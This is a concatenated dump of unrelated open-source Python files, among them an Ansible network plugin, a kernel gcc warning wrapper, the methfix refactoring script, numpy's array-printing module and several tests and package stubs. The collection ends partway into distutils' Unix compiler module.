# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import copy
from ansible.errors import AnsibleError
from ansible.plugins.action import ActionBase
from ansible.utils.display import Display
display = Display()
class ActionModule(ActionBase):
def run(self, tmp=None, task_vars=None):
del tmp # tmp no longer has any effect
result = {}
play_context = copy.deepcopy(self._play_context)
play_context.network_os = self._get_network_os(task_vars)
new_task = self._task.copy()
module = self._get_implementation_module(
play_context.network_os, self._task.action
)
if not module:
if self._task.args["fail_on_missing_module"]:
result["failed"] = True
else:
result["failed"] = False
result["msg"] = (
"Could not find implementation module %s for %s"
% (self._task.action, play_context.network_os)
)
return result
new_task.action = module
action = self._shared_loader_obj.action_loader.get(
play_context.network_os,
task=new_task,
connection=self._connection,
play_context=play_context,
loader=self._loader,
templar=self._templar,
shared_loader_obj=self._shared_loader_obj,
)
display.vvvv("Running implementation module %s" % module)
return action.run(task_vars=task_vars)
def _get_network_os(self, task_vars):
if "network_os" in self._task.args and self._task.args["network_os"]:
display.vvvv("Getting network OS from task argument")
network_os = self._task.args["network_os"]
elif self._play_context.network_os:
display.vvvv("Getting network OS from inventory")
network_os = self._play_context.network_os
elif (
"network_os" in task_vars.get("ansible_facts", {})
and task_vars["ansible_facts"]["network_os"]
):
display.vvvv("Getting network OS from fact")
network_os = task_vars["ansible_facts"]["network_os"]
else:
raise AnsibleError(
"ansible_network_os must be specified on this host to use platform agnostic modules"
)
return network_os
def _get_implementation_module(self, network_os, platform_agnostic_module):
module_name = (
network_os.split(".")[-1]
+ "_"
+ platform_agnostic_module.partition("_")[2]
)
if "." in network_os:
fqcn_module = ".".join(network_os.split(".")[0:-1])
implementation_module = fqcn_module + "." + module_name
else:
implementation_module = module_name
if implementation_module not in self._shared_loader_obj.module_loader:
implementation_module = None
return implementation_module
|
rkokkelk/CouchPotatoServer
|
refs/heads/master
|
libs/pyutil/test/deprecated/test_xor.py
|
106
|
#!/usr/bin/env python
# Copyright (c) 2002-2009 Zooko Wilcox-O'Hearn
# portions Copyright (c) 2001 Autonomous Zone Industries
# This file is part of pyutil; see README.rst for licensing terms.
#
import unittest
from pyutil.xor import xor
# unit tests
def _help_test(xf):
assert xf('\000', '\000') == '\000'
assert xf('\001', '\000') == '\001'
assert xf('\001', '\001') == '\000'
assert xf('\000\001', '\000\001') == '\000\000'
assert xf('\100\101', '\000\101') == '\100\000'
class Testy(unittest.TestCase):
def test_em(self):
for xorfunc in (xor.py_xor, xor.py_xor_simple, xor.xor,):
if callable(xorfunc):
# print "testing xorfunc ", xorfunc
_help_test(xorfunc)
|
pahaz/prospector
|
refs/heads/master
|
tests/finder/testdata/test1/package1/__init__.py
|
12133432
| |
dhruvagarwal/django
|
refs/heads/master
|
tests/generic_relations_regress/__init__.py
|
12133432
| |
snorp/hyde
|
refs/heads/master
|
repos/__init__.py
|
12133432
| |
yungchin/pykafka
|
refs/heads/master
|
tests/pykafka/__init__.py
|
12133432
| |
ELNOGAL/CMNT_00040_2016_ELN_addons
|
refs/heads/master
|
product_data_sheet/wizard/__init__.py
|
2
|
# -*- coding: utf-8 -*-
# Copyright 2021 El Nogal - Pedro Gómez <pegomez@elnogal.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import copy_product_ldm
|
dtsinc/DTS-Sound-Integration_CAF-Android-kernel
|
refs/heads/master
|
scripts/gcc-wrapper.py
|
90
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import errno
import re
import os
import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"return_address.c:63",
"kprobes.c:1493",
"rcutree.c:1614",
"af_unix.c:893",
"nl80211.c:58",
"jhash.h:137",
"cmpxchg.h:201",
"ping.c:87",
])
# Capture the name of the object file, can find it.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
def interpret_warning(line):
"""Decode the message from gcc. The messages we care about have a filename, and a warning"""
line = line.rstrip('\n')
m = warning_re.match(line)
if m and m.group(2) not in allowed_warnings:
print "error, forbidden warning:", m.group(2)
# If there is a warning, remove any object if it exists.
if ofile:
try:
os.remove(ofile)
except OSError:
pass
sys.exit(1)
def run_gcc():
args = sys.argv[1:]
# Look for -o
try:
i = args.index('-o')
global ofile
ofile = args[i+1]
except (ValueError, IndexError):
pass
compiler = sys.argv[0]
try:
proc = subprocess.Popen(args, stderr=subprocess.PIPE)
for line in proc.stderr:
print line,
interpret_warning(line)
result = proc.wait()
except OSError as e:
result = e.errno
if result == errno.ENOENT:
print args[0] + ':',e.strerror
print 'Is your PATH set correctly?'
else:
print ' '.join(args), str(e)
return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
|
k0ste/ansible
|
refs/heads/devel
|
lib/ansible/module_utils/facts/network/darwin.py
|
128
|
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.network.base import NetworkCollector
from ansible.module_utils.facts.network.generic_bsd import GenericBsdIfconfigNetwork
class DarwinNetwork(GenericBsdIfconfigNetwork):
"""
This is the Mac macOS Darwin Network Class.
It uses the GenericBsdIfconfigNetwork unchanged
"""
platform = 'Darwin'
# media line is different to the default FreeBSD one
def parse_media_line(self, words, current_if, ips):
# not sure if this is useful - we also drop information
current_if['media'] = 'Unknown' # Mac does not give us this
current_if['media_select'] = words[1]
if len(words) > 2:
# MacOSX sets the media to '<unknown type>' for bridge interface
# and parsing splits this into two words; this if/else helps
if words[1] == '<unknown' and words[2] == 'type>':
current_if['media_select'] = 'Unknown'
current_if['media_type'] = 'unknown type'
else:
current_if['media_type'] = words[2][1:-1]
if len(words) > 3:
current_if['media_options'] = self.get_options(words[3])
class DarwinNetworkCollector(NetworkCollector):
_fact_class = DarwinNetwork
_platform = 'Darwin'
|
lenoch/tagsetbench
|
refs/heads/master
|
html_writer.py
|
1
|
from collections import OrderedDict
from pathlib import PosixPath
with PosixPath(__file__).with_name('template.html').open() as f:
raw_template = f.read()
before_content, after_content = raw_template.split('\n{content}\n')
# TODO: možná vyhodit?
def header(title='', argv=None):
if not argv:
argv = {}
return before_content.format(title=title, input_params=argv)
def evaluation_summary(side, summary):
# layout tabulek:
# horizontální záhlaví se tolika sloupci, kolik je atributů
# anebo se sloupci, které odpovídají přímému/nepřímému vyhodnocení
# ⇒ všechny atributy vedle sebe a přímý s nepřímýma hned vedle sebe
# header with attributes
attributes = list(sorted(attrs for (attrs, values) in summary.items() if
isinstance(values, dict)))
value_names = {
'precision': 'Token precision', # TODO: ještě Sentence precision?
'correct': 'Correct tokens',
'total': 'Total tokens',
}
# reference, compared or difference
yield '<tr><th>{}<th><td colspan="20">{}</td></tr>'.format(side,
'') # BYLY: změny
yield '<tr><th>{}</th></tr>'.format(
'</th><th>'.join([''] + attributes + ['']) # side cells blank
)
for value in ('precision', 'correct', 'total'):
yield '<tr><th>{}</th><td>{}</td><th>{}</th></tr>'.format(
value_names[value],
'</td><td>'.join(str(summary[attr][value]) for attr in attributes),
value_names[value],
)
def evaluation_summary_sides_horizontal(attr, summary):
value_names = OrderedDict([
('total', 'Total tokens'),
('correct', 'Correct tokens'),
('precision', 'Category accuracy'),
# TODO: overall accuracy (prostě poměr počtu chyb/správnejch a všech
# tokenů, jako mám v přehledech skupin/clusterů chyb)
# TODO: ještě Sentence precision?
])
header = [attr] + list(value_names.values())
yield from simple_table([], header, enclose_in_tags=False)
sides = ['reference', 'compared', 'difference'] # TODO: 'gain'
for side in sides:
yield table_row([side] +
[summary[side][attr][value] for value in value_names])
# TODO: přepínač, jestli vypsat i <table> a </table>
# DONE: zatím napevno, možná přibyde kdyžtak <table id="{table_id}"
# class="{table_class}">
def simple_table(sorted_list, columns=None, header_lines=0,
enclose_in_tags=True, footer=False):
if enclose_in_tags:
yield '<table>'
headers = []
if columns:
headers.append(columns)
rows = iter(sorted_list)
for i in range(header_lines):
headers.append(next(rows))
for header in headers:
# TODO: využít funkci table_row, až bude zobecněná
yield '<tr><th>{}</th></tr>'.format(
'</th><th>'.join(header),
)
for row in rows:
yield table_row(row)
if footer:
for header in reversed(headers):
yield '<tr><th>{}</th></tr>'.format(
'</th><th>'.join(header),
)
if enclose_in_tags:
yield '</table>'
# TODO: nějak to zobecnit, aby to mohla využít funkce simple_table?
# – třeba s pomocí druhýho seznamu, kde bude True/False podle toho,
# jestli jde obyč buňku/záhlaví (a prostě bych to zipoval_longest)
def table_row(values):
# return '<tr><th>{}</th>{}</tr>'.format(
# header, ''.join('<td>{}</td>'.format(value) for value in values))
return '<tr>{}</tr>'.format(
''.join('<td>{}</td>'.format(format_value(value)) for value in values))
# protistrana (která to parsuje) je v compare_evaluation.py
def format_value(value):
if isinstance(value, float):
return format(value, '0.3%')
else:
return value
|
wskplho/sl4a
|
refs/heads/master
|
python/src/Tools/scripts/methfix.py
|
96
|
#! /usr/bin/env python
# Fix Python source files to avoid using
# def method(self, (arg1, ..., argn)):
# instead of the more rational
# def method(self, arg1, ..., argn):
#
# Command line arguments are files or directories to be processed.
# Directories are searched recursively for files whose name looks
# like a python module.
# Symbolic links are always ignored (except as explicit directory
# arguments). Of course, the original file is kept as a back-up
# (with a "~" attached to its name).
# It complains about binaries (files containing null bytes)
# and about files that are ostensibly not Python files: if the first
# line starts with '#!' and does not contain the string 'python'.
#
# Changes made are reported to stdout in a diff-like format.
#
# Undoubtedly you can do this using find and sed or perl, but this is
# a nice example of Python code that recurses down a directory tree
# and uses regular expressions. Also note several subtleties like
# preserving the file's mode and avoiding to even write a temp file
# when no changes are needed for a file.
#
# NB: by changing only the function fixline() you can turn this
# into a program for a different change to Python programs...
import sys
import re
import os
from stat import *
err = sys.stderr.write
dbg = err
rep = sys.stdout.write
def main():
bad = 0
if not sys.argv[1:]: # No arguments
err('usage: ' + sys.argv[0] + ' file-or-directory ...\n')
sys.exit(2)
for arg in sys.argv[1:]:
if os.path.isdir(arg):
if recursedown(arg): bad = 1
elif os.path.islink(arg):
err(arg + ': will not process symbolic links\n')
bad = 1
else:
if fix(arg): bad = 1
sys.exit(bad)
ispythonprog = re.compile('^[a-zA-Z0-9_]+\.py$')
def ispython(name):
return ispythonprog.match(name) >= 0
def recursedown(dirname):
dbg('recursedown(%r)\n' % (dirname,))
bad = 0
try:
names = os.listdir(dirname)
except os.error, msg:
err('%s: cannot list directory: %r\n' % (dirname, msg))
return 1
names.sort()
subdirs = []
for name in names:
if name in (os.curdir, os.pardir): continue
fullname = os.path.join(dirname, name)
if os.path.islink(fullname): pass
elif os.path.isdir(fullname):
subdirs.append(fullname)
elif ispython(name):
if fix(fullname): bad = 1
for fullname in subdirs:
if recursedown(fullname): bad = 1
return bad
def fix(filename):
## dbg('fix(%r)\n' % (filename,))
try:
f = open(filename, 'r')
except IOError, msg:
err('%s: cannot open: %r\n' % (filename, msg))
return 1
head, tail = os.path.split(filename)
tempname = os.path.join(head, '@' + tail)
g = None
# If we find a match, we rewind the file and start over but
# now copy everything to a temp file.
lineno = 0
while 1:
line = f.readline()
if not line: break
lineno = lineno + 1
if g is None and '\0' in line:
# Check for binary files
err(filename + ': contains null bytes; not fixed\n')
f.close()
return 1
if lineno == 1 and g is None and line[:2] == '#!':
# Check for non-Python scripts
words = line[2:].split()
if words and re.search('[pP]ython', words[0]) < 0:
msg = filename + ': ' + words[0]
msg = msg + ' script; not fixed\n'
err(msg)
f.close()
return 1
while line[-2:] == '\\\n':
nextline = f.readline()
if not nextline: break
line = line + nextline
lineno = lineno + 1
newline = fixline(line)
if newline != line:
if g is None:
try:
g = open(tempname, 'w')
except IOError, msg:
f.close()
err('%s: cannot create: %r\n' % (tempname, msg))
return 1
f.seek(0)
lineno = 0
rep(filename + ':\n')
continue # restart from the beginning
rep(repr(lineno) + '\n')
rep('< ' + line)
rep('> ' + newline)
if g is not None:
g.write(newline)
# End of file
f.close()
if not g: return 0 # No changes
# Finishing touch -- move files
# First copy the file's mode to the temp file
try:
statbuf = os.stat(filename)
os.chmod(tempname, statbuf[ST_MODE] & 07777)
except os.error, msg:
err('%s: warning: chmod failed (%r)\n' % (tempname, msg))
# Then make a backup of the original file as filename~
try:
os.rename(filename, filename + '~')
except os.error, msg:
err('%s: warning: backup failed (%r)\n' % (filename, msg))
# Now move the temp file to the original file
try:
os.rename(tempname, filename)
except os.error, msg:
err('%s: rename failed (%r)\n' % (filename, msg))
return 1
# Return succes
return 0
fixpat = '^[ \t]+def +[a-zA-Z0-9_]+ *( *self *, *(( *(.*) *)) *) *:'
fixprog = re.compile(fixpat)
def fixline(line):
if fixprog.match(line) >= 0:
(a, b), (c, d) = fixprog.regs[1:3]
line = line[:a] + line[c:d] + line[b:]
return line
if __name__ == '__main__':
main()
|
martydill/url_shortener
|
refs/heads/master
|
code/venv/lib/python2.7/site-packages/dateutil/__init__.py
|
133
|
# -*- coding: utf-8 -*-
__version__ = "2.4.2"
|
biswajitsahu/kuma
|
refs/heads/master
|
vendor/packages/pygments/lexers/web.py
|
77
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.web
~~~~~~~~~~~~~~~~~~~
Just export previously exported lexers.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexers.html import HtmlLexer, DtdLexer, XmlLexer, XsltLexer, \
HamlLexer, ScamlLexer, JadeLexer
from pygments.lexers.css import CssLexer, SassLexer, ScssLexer
from pygments.lexers.javascript import JavascriptLexer, LiveScriptLexer, \
DartLexer, TypeScriptLexer, LassoLexer, ObjectiveJLexer, CoffeeScriptLexer
from pygments.lexers.actionscript import ActionScriptLexer, \
ActionScript3Lexer, MxmlLexer
from pygments.lexers.php import PhpLexer
from pygments.lexers.webmisc import DuelLexer, XQueryLexer, SlimLexer, QmlLexer
from pygments.lexers.data import JsonLexer
JSONLexer = JsonLexer # for backwards compatibility with Pygments 1.5
__all__ = []
|
RalphBariz/RalphsDotNet
|
refs/heads/master
|
Old/RalphsDotNet.Apps.OptimizationStudio/Resources/PyLib/numpy/core/arrayprint.py
|
55
|
"""Array printing function
$Id: arrayprint.py,v 1.9 2005/09/13 13:58:44 teoliphant Exp $
"""
__all__ = ["array2string", "set_printoptions", "get_printoptions"]
__docformat__ = 'restructuredtext'
#
# Written by Konrad Hinsen <hinsenk@ere.umontreal.ca>
# last revision: 1996-3-13
# modified by Jim Hugunin 1997-3-3 for repr's and str's (and other details)
# and by Perry Greenfield 2000-4-1 for numarray
# and by Travis Oliphant 2005-8-22 for numpy
import sys
import numerictypes as _nt
from umath import maximum, minimum, absolute, not_equal, isnan, isinf
from multiarray import format_longfloat
from fromnumeric import ravel
def product(x, y): return x*y
_summaryEdgeItems = 3 # repr N leading and trailing items of each dimension
_summaryThreshold = 1000 # total items > triggers array summarization
_float_output_precision = 8
_float_output_suppress_small = False
_line_width = 75
_nan_str = 'nan'
_inf_str = 'inf'
if sys.version_info[0] >= 3:
from functools import reduce
def set_printoptions(precision=None, threshold=None, edgeitems=None,
linewidth=None, suppress=None,
nanstr=None, infstr=None):
"""
Set printing options.
These options determine the way floating point numbers, arrays and
other NumPy objects are displayed.
Parameters
----------
precision : int, optional
Number of digits of precision for floating point output (default 8).
threshold : int, optional
Total number of array elements which trigger summarization
rather than full repr (default 1000).
edgeitems : int, optional
Number of array items in summary at beginning and end of
each dimension (default 3).
linewidth : int, optional
The number of characters per line for the purpose of inserting
line breaks (default 75).
suppress : bool, optional
Whether or not suppress printing of small floating point values
using scientific notation (default False).
nanstr : str, optional
String representation of floating point not-a-number (default nan).
infstr : str, optional
String representation of floating point infinity (default inf).
See Also
--------
get_printoptions, set_string_function
Examples
--------
Floating point precision can be set:
>>> np.set_printoptions(precision=4)
>>> print np.array([1.123456789])
[ 1.1235]
Long arrays can be summarised:
>>> np.set_printoptions(threshold=5)
>>> print np.arange(10)
[0 1 2 ..., 7 8 9]
Small results can be suppressed:
>>> eps = np.finfo(float).eps
>>> x = np.arange(4.)
>>> x**2 - (x + eps)**2
array([ -4.9304e-32, -4.4409e-16, 0.0000e+00, 0.0000e+00])
>>> np.set_printoptions(suppress=True)
>>> x**2 - (x + eps)**2
array([-0., -0., 0., 0.])
To put back the default options, you can use:
>>> np.set_printoptions(edgeitems=3,infstr='Inf',
... linewidth=75, nanstr='NaN', precision=8,
... suppress=False, threshold=1000)
"""
global _summaryThreshold, _summaryEdgeItems, _float_output_precision, \
_line_width, _float_output_suppress_small, _nan_str, _inf_str
if linewidth is not None:
_line_width = linewidth
if threshold is not None:
_summaryThreshold = threshold
if edgeitems is not None:
_summaryEdgeItems = edgeitems
if precision is not None:
_float_output_precision = precision
if suppress is not None:
_float_output_suppress_small = not not suppress
if nanstr is not None:
_nan_str = nanstr
if infstr is not None:
_inf_str = infstr
def get_printoptions():
"""
Return the current print options.
Returns
-------
print_opts : dict
Dictionary of current print options with keys
- precision : int
- threshold : int
- edgeitems : int
- linewidth : int
- suppress : bool
- nanstr : str
- infstr : str
For a full description of these options, see `set_printoptions`.
See Also
--------
set_printoptions, set_string_function
"""
d = dict(precision=_float_output_precision,
threshold=_summaryThreshold,
edgeitems=_summaryEdgeItems,
linewidth=_line_width,
suppress=_float_output_suppress_small,
nanstr=_nan_str,
infstr=_inf_str)
return d
def _leading_trailing(a):
import numeric as _nc
if a.ndim == 1:
if len(a) > 2*_summaryEdgeItems:
b = _nc.concatenate((a[:_summaryEdgeItems],
a[-_summaryEdgeItems:]))
else:
b = a
else:
if len(a) > 2*_summaryEdgeItems:
l = [_leading_trailing(a[i]) for i in range(
min(len(a), _summaryEdgeItems))]
l.extend([_leading_trailing(a[-i]) for i in range(
min(len(a), _summaryEdgeItems),0,-1)])
else:
l = [_leading_trailing(a[i]) for i in range(0, len(a))]
b = _nc.concatenate(tuple(l))
return b
def _boolFormatter(x):
if x: return ' True'
else: return 'False'
def _array2string(a, max_line_width, precision, suppress_small, separator=' ',
prefix=""):
if max_line_width is None:
max_line_width = _line_width
if precision is None:
precision = _float_output_precision
if suppress_small is None:
suppress_small = _float_output_suppress_small
if a.size > _summaryThreshold:
summary_insert = "..., "
data = _leading_trailing(a)
else:
summary_insert = ""
data = ravel(a)
try:
format_function = a._format
except AttributeError:
dtypeobj = a.dtype.type
if issubclass(dtypeobj, _nt.bool_):
# make sure True and False line up.
format_function = _boolFormatter
elif issubclass(dtypeobj, _nt.integer):
if issubclass(dtypeobj, _nt.timeinteger):
format_function = str
else:
max_str_len = max(len(str(maximum.reduce(data))),
len(str(minimum.reduce(data))))
format = '%' + str(max_str_len) + 'd'
format_function = lambda x: _formatInteger(x, format)
elif issubclass(dtypeobj, _nt.floating):
if issubclass(dtypeobj, _nt.longfloat):
format_function = _longfloatFormatter(precision)
else:
format_function = FloatFormat(data, precision, suppress_small)
elif issubclass(dtypeobj, _nt.complexfloating):
if issubclass(dtypeobj, _nt.clongfloat):
format_function = _clongfloatFormatter(precision)
else:
format_function = ComplexFormat(data, precision, suppress_small)
elif issubclass(dtypeobj, _nt.unicode_) or \
issubclass(dtypeobj, _nt.string_):
format_function = repr
else:
format_function = str
next_line_prefix = " " # skip over "["
next_line_prefix += " "*len(prefix) # skip over array(
lst = _formatArray(a, format_function, len(a.shape), max_line_width,
next_line_prefix, separator,
_summaryEdgeItems, summary_insert)[:-1]
return lst
def _convert_arrays(obj):
import numeric as _nc
newtup = []
for k in obj:
if isinstance(k, _nc.ndarray):
k = k.tolist()
elif isinstance(k, tuple):
k = _convert_arrays(k)
newtup.append(k)
return tuple(newtup)
def array2string(a, max_line_width = None, precision = None,
suppress_small = None, separator=' ', prefix="",
style=repr):
"""
Return a string representation of an array.
Parameters
----------
a : ndarray
Input array.
max_line_width : int, optional
The maximum number of columns the string should span. Newline
characters splits the string appropriately after array elements.
precision : int, optional
Floating point precision. Default is the current printing
precision (usually 8), which can be altered using `set_printoptions`.
suppress_small : bool, optional
Represent very small numbers as zero. A number is "very small" if it
is smaller than the current printing precision.
separator : str, optional
Inserted between elements.
prefix : str, optional
An array is typically printed as::
'prefix(' + array2string(a) + ')'
The length of the prefix string is used to align the
output correctly.
style : function, optional
A function that accepts an ndarray and returns a string. Used only
when the shape of `a` is equal to ().
Returns
-------
array_str : str
String representation of the array.
See Also
--------
array_str, array_repr, set_printoptions
Examples
--------
>>> x = np.array([1e-16,1,2,3])
>>> print np.array2string(x, precision=2, separator=',',
... suppress_small=True)
[ 0., 1., 2., 3.]
"""
if a.shape == ():
x = a.item()
try:
lst = a._format(x)
except AttributeError:
if isinstance(x, tuple):
x = _convert_arrays(x)
lst = style(x)
elif reduce(product, a.shape) == 0:
# treat as a null array if any of shape elements == 0
lst = "[]"
else:
lst = _array2string(a, max_line_width, precision, suppress_small,
separator, prefix)
return lst
def _extendLine(s, line, word, max_line_len, next_line_prefix):
if len(line.rstrip()) + len(word.rstrip()) >= max_line_len:
s += line.rstrip() + "\n"
line = next_line_prefix
line += word
return s, line
def _formatArray(a, format_function, rank, max_line_len,
next_line_prefix, separator, edge_items, summary_insert):
"""formatArray is designed for two modes of operation:
1. Full output
2. Summarized output
"""
if rank == 0:
obj = a.item()
if isinstance(obj, tuple):
obj = _convert_arrays(obj)
return str(obj)
if summary_insert and 2*edge_items < len(a):
leading_items, trailing_items, summary_insert1 = \
edge_items, edge_items, summary_insert
else:
leading_items, trailing_items, summary_insert1 = 0, len(a), ""
if rank == 1:
s = ""
line = next_line_prefix
for i in xrange(leading_items):
word = format_function(a[i]) + separator
s, line = _extendLine(s, line, word, max_line_len, next_line_prefix)
if summary_insert1:
s, line = _extendLine(s, line, summary_insert1, max_line_len, next_line_prefix)
for i in xrange(trailing_items, 1, -1):
word = format_function(a[-i]) + separator
s, line = _extendLine(s, line, word, max_line_len, next_line_prefix)
word = format_function(a[-1])
s, line = _extendLine(s, line, word, max_line_len, next_line_prefix)
s += line + "]\n"
s = '[' + s[len(next_line_prefix):]
else:
s = '['
sep = separator.rstrip()
for i in xrange(leading_items):
if i > 0:
s += next_line_prefix
s += _formatArray(a[i], format_function, rank-1, max_line_len,
" " + next_line_prefix, separator, edge_items,
summary_insert)
s = s.rstrip() + sep.rstrip() + '\n'*max(rank-1,1)
if summary_insert1:
s += next_line_prefix + summary_insert1 + "\n"
for i in xrange(trailing_items, 1, -1):
if leading_items or i != trailing_items:
s += next_line_prefix
s += _formatArray(a[-i], format_function, rank-1, max_line_len,
" " + next_line_prefix, separator, edge_items,
summary_insert)
s = s.rstrip() + sep.rstrip() + '\n'*max(rank-1,1)
if leading_items or trailing_items > 1:
s += next_line_prefix
s += _formatArray(a[-1], format_function, rank-1, max_line_len,
" " + next_line_prefix, separator, edge_items,
summary_insert).rstrip()+']\n'
return s
class FloatFormat(object):
def __init__(self, data, precision, suppress_small, sign=False):
self.precision = precision
self.suppress_small = suppress_small
self.sign = sign
self.exp_format = False
self.large_exponent = False
self.max_str_len = 0
self.fillFormat(data)
def fillFormat(self, data):
import numeric as _nc
errstate = _nc.seterr(all='ignore')
try:
special = isnan(data) | isinf(data)
non_zero = absolute(data.compress(not_equal(data, 0) & ~special))
if len(non_zero) == 0:
max_val = 0.
min_val = 0.
else:
max_val = maximum.reduce(non_zero)
min_val = minimum.reduce(non_zero)
if max_val >= 1.e8:
self.exp_format = True
if not self.suppress_small and (min_val < 0.0001
or max_val/min_val > 1000.):
self.exp_format = True
finally:
_nc.seterr(**errstate)
if self.exp_format:
self.large_exponent = 0 < min_val < 1e-99 or max_val >= 1e100
self.max_str_len = 8 + self.precision
if self.large_exponent:
self.max_str_len += 1
if self.sign:
format = '%+'
else:
format = '%'
format = format + '%d.%de' % (self.max_str_len, self.precision)
else:
format = '%%.%df' % (self.precision,)
if len(non_zero):
precision = max([_digits(x, self.precision, format)
for x in non_zero])
else:
precision = 0
precision = min(self.precision, precision)
self.max_str_len = len(str(int(max_val))) + precision + 2
if _nc.any(special):
self.max_str_len = max(self.max_str_len,
len(_nan_str),
len(_inf_str)+1)
if self.sign:
format = '%#+'
else:
format = '%#'
format = format + '%d.%df' % (self.max_str_len, precision)
self.special_fmt = '%%%ds' % (self.max_str_len,)
self.format = format
def __call__(self, x, strip_zeros=True):
import numeric as _nc
err = _nc.seterr(invalid='ignore')
try:
if isnan(x):
return self.special_fmt % (_nan_str,)
elif isinf(x):
if x > 0:
return self.special_fmt % (_inf_str,)
else:
return self.special_fmt % ('-' + _inf_str,)
finally:
_nc.seterr(**err)
s = self.format % x
if self.large_exponent:
# 3-digit exponent
expsign = s[-3]
if expsign == '+' or expsign == '-':
s = s[1:-2] + '0' + s[-2:]
elif self.exp_format:
# 2-digit exponent
if s[-3] == '0':
s = ' ' + s[:-3] + s[-2:]
elif strip_zeros:
z = s.rstrip('0')
s = z + ' '*(len(s)-len(z))
return s
def _digits(x, precision, format):
s = format % x
z = s.rstrip('0')
return precision - len(s) + len(z)
_MAXINT = sys.maxint
_MININT = -sys.maxint-1
def _formatInteger(x, format):
if _MININT < x < _MAXINT:
return format % x
else:
return "%s" % x
def _longfloatFormatter(precision):
# XXX Have to add something to determine the width to use a la FloatFormat
# Right now, things won't line up properly
def formatter(x):
if isnan(x):
return _nan_str
elif isinf(x):
if x > 0:
return _inf_str
else:
return '-' + _inf_str
return format_longfloat(x, precision)
return formatter
def _clongfloatFormatter(precision):
def formatter(x):
r = format_longfloat(x.real, precision)
i = format_longfloat(x.imag, precision)
return '%s+%sj' % (r, i)
return formatter
class ComplexFormat(object):
def __init__(self, x, precision, suppress_small):
self.real_format = FloatFormat(x.real, precision, suppress_small)
self.imag_format = FloatFormat(x.imag, precision, suppress_small,
sign=True)
def __call__(self, x):
r = self.real_format(x.real, strip_zeros=False)
i = self.imag_format(x.imag, strip_zeros=False)
if not self.imag_format.exp_format:
z = i.rstrip('0')
i = z + 'j' + ' '*(len(i)-len(z))
else:
i = i + 'j'
return r + i
## end
|
wsoula/jenkins-job-builder
|
refs/heads/master
|
tests/publishers/test_publishers.py
|
11
|
# Joint copyright:
# - Copyright 2012,2013 Wikimedia Foundation
# - Copyright 2012,2013 Antoine "hashar" Musso
# - Copyright 2013 Arnaud Fabre
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from jenkins_jobs.modules import publishers
from tests import base
class TestCaseModulePublishers(base.BaseScenariosTestCase):
fixtures_path = os.path.join(os.path.dirname(__file__), 'fixtures')
scenarios = base.get_scenarios(fixtures_path)
klass = publishers.Publishers
|
sexroute/commandergenius
|
refs/heads/sdl_android
|
project/jni/python/src/Lib/distutils/unixccompiler.py
|
33
|
"""distutils.unixccompiler
Contains the UnixCCompiler class, a subclass of CCompiler that handles
the "typical" Unix-style command-line C compiler:
* macros defined with -Dname[=value]
* macros undefined with -Uname
* include search directories specified with -Idir
* libraries specified with -lllib
* library search directories specified with -Ldir
* compile handled by 'cc' (or similar) executable with -c option:
compiles .c to .o
* link static library handled by 'ar' command (possibly with 'ranlib')
* link shared library handled by 'cc -shared'
"""
__revision__ = "$Id: unixccompiler.py 65012 2008-07-16 13:24:06Z jesse.noller $"
import os, sys
from types import StringType, NoneType
from distutils import sysconfig
from distutils.dep_util import newer
from distutils.ccompiler import \
CCompiler, gen_preprocess_options, gen_lib_options
from distutils.errors import \
